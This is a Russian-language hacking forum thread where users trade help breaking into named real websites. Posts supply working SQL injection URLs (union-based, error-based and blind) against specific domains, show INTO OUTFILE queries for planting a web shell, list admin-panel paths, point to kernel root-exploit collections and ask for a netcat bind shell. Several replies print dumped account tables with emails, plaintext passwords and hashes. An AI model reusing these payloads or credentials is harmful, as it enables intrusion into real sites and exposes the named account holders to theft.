Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?

Если это возможно приведите плз пример

SEWERN said:
Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?
Если это возможно приведите плз пример



Нет нельзя.Подумай сам если бы такое было возможно, то раздел рашифровки хешей был бы не нужен.А если по теме то почитай доки мускуля а в частности UNION+SELECT

и UPDATE

SEWERN said:
Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?
Если это возможно приведите плз пример




PHP:
UPDATE admin SET email='admin@admin.ru'WHERE u ser_name='admin'

обновит емайл юзера под ником "admin" , вроде как. Но как подметил Gorev , чаще всего это невозможно... не хватает прав.

Читал доки , но как говорится надежда умирает последней )))

Спс.

очень прошу помочь найти админку тут zipp.com

-PRIVAT- said:

PHP:
UPDATE admin SET email='admin@admin.ru'WHERE u ser_name='admin'

обновит емайл юзера под ником "admin" , вроде как. Но как подметил
Gorev
, чаще всего это невозможно... не хватает прав.


Это невозможно всегда, дело не в правах а в синтаксисе мускуля (если говорим про данный оператор в иньекции) UPDATE после UNION SELECT не работает.

подскажите скриптец аналог bind.pl, но на пхп,

то есть цель - забиндить порт средствами пхп с целью туда неткатом подключиться

jecka3000 said:
очень прошу помочь найти админку тут zipp.com


http://zipp.com/media/

/path/to/script?id=


Code:
if ($id){
#Fields that can be viewed only.
$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
$sql .= "FROM table1 p1, table2 p2 WHERE ";
$sql .= "p1.id = p2.id AND p1.id = '$id'";
$result = mysql_query($sql);
...

mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны

lukmus said:
/path/to/script?id=

Code:
if ($id){
#Fields that can be viewed only.
$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
$sql .= "FROM table1 p1, table2 p2 WHERE ";
$sql .= "p1.id = p2.id AND p1.id = '$id'";
$result = mysql_query($sql);
...

mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны



PHP:
/path/to/script?id=1' or 1 group by concat(version(),f loor(rand(0)*2))having min(0) or 1--


только подзапросы поддерживаться не будут.

люди можете помочь наити експлоит под апаче версии 1.3.36 спасибо

-PRIVAT- said:

PHP:
/path/to/script?id=1' or 1 group by concat(version(),f loor(rand(0)*2))having min(0) or 1--

только подзапросы поддерживаться не будут.


я не очень понимаю твою мысль, как по твойму будет выглядеть запрос к БД и каким образом это обойдет ковычки?

по-мойму запрос будет такой:


Code:
SELECT bla,bla,bla FROM table1 p1, table2 p2 WHERE p1.id = p2.id AND p1.id = '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'

и запрос ничего не вернет т.к. нет такого поле, где id равно строке '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'

Верный запрос:


Code:
1'+or+1+group+by+concat(version(),floor(rand(0)*2) )+having+min(0)+or+1 -- a

Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.

Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union.

Все что можно сделать это:


Code:
1'+and+ascii(substring(password,1,1))>66 -- a



Code:
1'+and+substring(password,1,1)='f' -- a

По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя.

Redwood said:
Верный запрос:

Code:
1'+or+1+group+by+concat(version(),floor(rand(0)*2) )+having+min(0)+or+1 -- a

Но не в этом не суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.


я так не думаю т.к. уже вытащил пол таблицы методом слепой скули а-ля:


Code:
id=1+AND+128>ascii(mid(column,1,1))

фишка в том, как вы понимаете, что вытащить можно хоть все поля всех записей из нужной таблицы, если данный запрос уязвим.

Здесь вообще речь не об этом, а о том как обойти эти кавычки. Код скрипта обработчика я привел, но каким-то макаром если я подставляю ковычку в


Code:
script.php?id=1'

на странице все равно верный результат т.е. кавычка как-то фильтруется, так вот как она фильтруется и как это обойти?

http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+

чё не так делаю?

KandidaT'S said:
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+
чё не так делаю?



http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,3,4,5,6,7,8,9,10+from+vbb_ users--+

_ потерял...смотри внимательнее как табла называется

и с какого перепугу ты колонку тоже неправильно написал? версия 5 , выводи все правильно...

http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,name,pwd,5,6,7,8,9,10+from +vbb_users--+

Тож смотрю на дамп и не вижу такой таблици. Вот если нужно дамп структуры - http://rghost.ru/2790176

a где там админка форума?)

Помогите найти админку www.ealandmania.net

KandidaT'S said:
a где там админка форума?)


а ты это форумом называешь?

=)

всё таки где админка ?

ALIM said:
Помогите найти админку www.ealandmania.net


www.ealandmania.net/admin

www.ealandmania.net/controlpanel/

www.ealandmania.net/cpanel/

www.ealandmania.net/kpanel/

-PRIVAT-

tnx

Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит

http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--

ALIM said:
-PRIVAT-
tnx
Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--




Code:
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+row(1,2)in(select+count(*),concat((select +table_name+from+information_schema.tables+limit+0 ,1),0x3a,floor(rand(0)*2))as+a+from+information_sc hema.tables+x+group+by+a)

Дальше лимитом перебирай

ребят нужна помощь, не могу найти админку


Code:
http://www.shalomtv.tv

в ПМ пожалуйста

помогите найти логины и пароли сайта kitcom.ru

SQL inj:

http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()

AttackPro said:
помогите найти логины и пароли сайта kitcom.ru
SQL inj:
http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()


http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,version()+--+

В 4.1.21 нету information_schema , значит не получится вывести таблицу с аккаунтами ...

Как выриант брутить таблицы

http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,concat_ws(0x3a,login,pwd)+fro m+users+--+

Подабрал users,accounts - дальше сам пробуй )

спасибо

а админку?

kitcom.ru/admin

нашел

http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,name+from+groups

AttackPro said:
помогите найти логины и пароли сайта kitcom.ru
SQL inj:
http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()


держи


PHP:
login email pwd

aav vml@kitcom.ru tirthadas

admin glebov@kitcom.ru flvby1

bea support@kitcom.ru cosys976

biv ivan flvby2_

glbuh kvi@kitcom.ru flvby2_3

gvv svg@kitcom.ru flvby3_3

ivan biv@kitcom.ru flvby_3

ivan@kitco kvp1@kitcom.ru flvby4 2_

kel mobil@kitcom.ru fsota2_

KNN glbuh@kitcom.ru lvvy42_

kvi ivan@kitcom.ru flvby2_

kvp1 sna@kitcom.ru job04

KVV nshr nshr1_

Ljcneg support@kitcom.ru Pfrfhsn

news sps@kitcom.ru yjDsq2_

nshr kel@kitcom.ru TotKjby_

sna gsa@kitcom.ru news_

sps bea@kitcom.ru job1104

svg tea@kitcom.ru dynax19xxx

tea knn@kitcom.ru KNN

vml kv@kitcom.ru KVV

огромное спасибо

--------------

ток при входе пишет что неправильные данные

дал всё что было

ладно спасибо мне просто интересно

помогите найти админку

http://www.karat-telecom.ru/

AC//DC said:
помогите найти админку
http://www.karat-telecom.ru/


http://www.karat-telecom.ru/Album/login.php

http://www.karat-telecom.ru/Album/admin.php - У Вас нет прав для просмотра этой страницы.

ALIM said:
-PRIVAT-
tnx
Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--


Думаю ты искал это =)


Code:
username password
azrael 50ec504080ee3b965271235bf7789946
fies 5452eea2e1ff9cefa25f5fb590386dfb
muster 96f570c3c87558604e79f35637b4663c
test 098f6bcd4621d373cade4e832627b4f6

http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+%28select+1+from+%28select+count%280%29,c oncat%28%28select+table_name+from+information_sche ma.tables+limit+0,1%29,floor%28rand%280%29*2%29%29 +from+information_schema.tables+group+by+2%29a%29--

дальше сам крути...

На сайте в комментах знаки


Code:


преобразуются в


Code:
< >

и выводятся обычным текстом. Это можно как-нибудь обойти?

moby.exe said:
На сайте в комментах знаки

Code:


преобразуются в

Code:
< >

и выводятся обычным текстом. Это можно как-нибудь обойти?


Можно закодировать так.


Code:
%3C%20%3E

URL

[CODE]
Code:

Где сохраняются аватары в phpBB? Есть ЛФИ и полный путь к сайту, пробую подгрузить в аватаре в метаданных пхп код, но выводится она похоже через скрипт, неужели прямо в бд сохраняются аватары? Если так, то как еще можно загрузить шелл? Спасибо

officepro.am


pomoqite nayti adminku..

boxazbox said:
pomoqite nayti adminku..


officepro.am/controlpanel/

officepro.am/cpanel/

officepro.am/kpanel/

Помогите найти сплоит под ядро


$ uname -a
Linux ptzhost.com 2.6.26-bpo.1-amd64 #1 SMP Thu Mar 26 23:14:12 UTC 2009 x86_64 GNU/Linux

http://l0calr00t.hackerzhub.net/2.6.r1z/
http://l0calr00t.hackerzhub.net/2010/
http://l0calr00t.hackerzhub.net/Best%20Local/Locals/


probuy/

stepashka_ said:
Помогите найти сплоит под ядро


sock_sendpage() должен сработать...

Возможно ли проведение sql-инъекции?

$query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"';

Спасибо

asia555 said:
Возможно ли проведение sql-инъекции?
$query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"';
Спасибо


Невозможно.

хэлп помогтие раскрутить

http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'

http://www.ncm.org.uk/news.asp?id=1'

http://www.yakutproekt.ru/news.php?id=14517'

http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail

http://www.ncm.org.uk/news.asp?id=1+and+1=(select+top+1+table_name+from+ information_schema.tables)

дальше сам

pinch said:
хэлп помогтие раскрутить
http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail


http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20concat(version(),floo r(rand(0)*2))having%20min(0)%20or%201--%201&act=detail

Если не знаешь как дальше, то пиши в ПМ

-PRIVAT- said:
http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20concat(version(),floo r(rand(0)*2))having%20min(0)%20or%201--%201&act=detail
Если не знаешь как дальше, то пиши в ПМ


http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--&act=detail

mm?

Konqi said:
http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--&act=detail
mm?


мм... можно и так

чуваки в том то и дело что FROM никак не вставишь=((

хотел станд. методом

так уж быть

http://www.lpem.org/index.php?mn=6&sb=9&id=9+and+%28select+1+from+%28select+count%280%29,c oncat%28%28select+version%28%29%29,floor%28rand%28 0%29*2%29%29+from+information_schema.tables+group+ by+2%29a%29--&act=detail

Duplicate entry '5.1.50-log1' for key 'group_key'

http://www.yakutproekt.ru/news.php?id=14517'

вот это надо ....

pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....


тут точно не мускул, думаю ms_sql, но не скажу почему )

21 столбцов но селект не робит.

если есть желание копай дальше

ну да, mssql

http://www.yakutproekt.ru/news.php?id=14517+and+len(@@version)=len(@@version )

4-ый сайт вообще не открывается без ошибки..

Выдрал лоигины и пассы админов на отдном сайте...

Попал в админку) в админке написанно Extasy CMS for site.ru

Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос

и доступен html

мб как то можно залить шел с помощью sql запроса?

GroM88 said:
мб как то можно залить шел с помощью sql запроса?


для этого ты должен иметь права на запись и знать локальный путь до сайта.

чтобы узнать есть ли права, используй запрос

UNION SELECT File_Priv from mysql.user

если в ответ получишь Y, то права есть.

чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь.

если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла:

UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'

GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?


кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...

pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....


БД


master
tempdb
model
msdb
telecom
zaokolmi
zags
р–master


Таблы с БД zaokolmi


dtproperties
foto_catalog
auto_catalog
admin


pwd name

009091b3166dcbe1aa6202a97bcda08a zao

пароль от хеша 123456 вроде

Сайты на сервере(ReverseIP): больше 50

кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.

shell_code плиииз запросы в личку

GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?



site?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.

и да Требуются привилегии FILE

GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?


Почитай (Заливка шелла через MYSQL) (https://rdot.org/forum/showthread.php?t=352)

а d1v что написал то ? =\

Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.

Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).

Ужасно глупый вопрос.

Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?

В моем браузере отключены скритпы.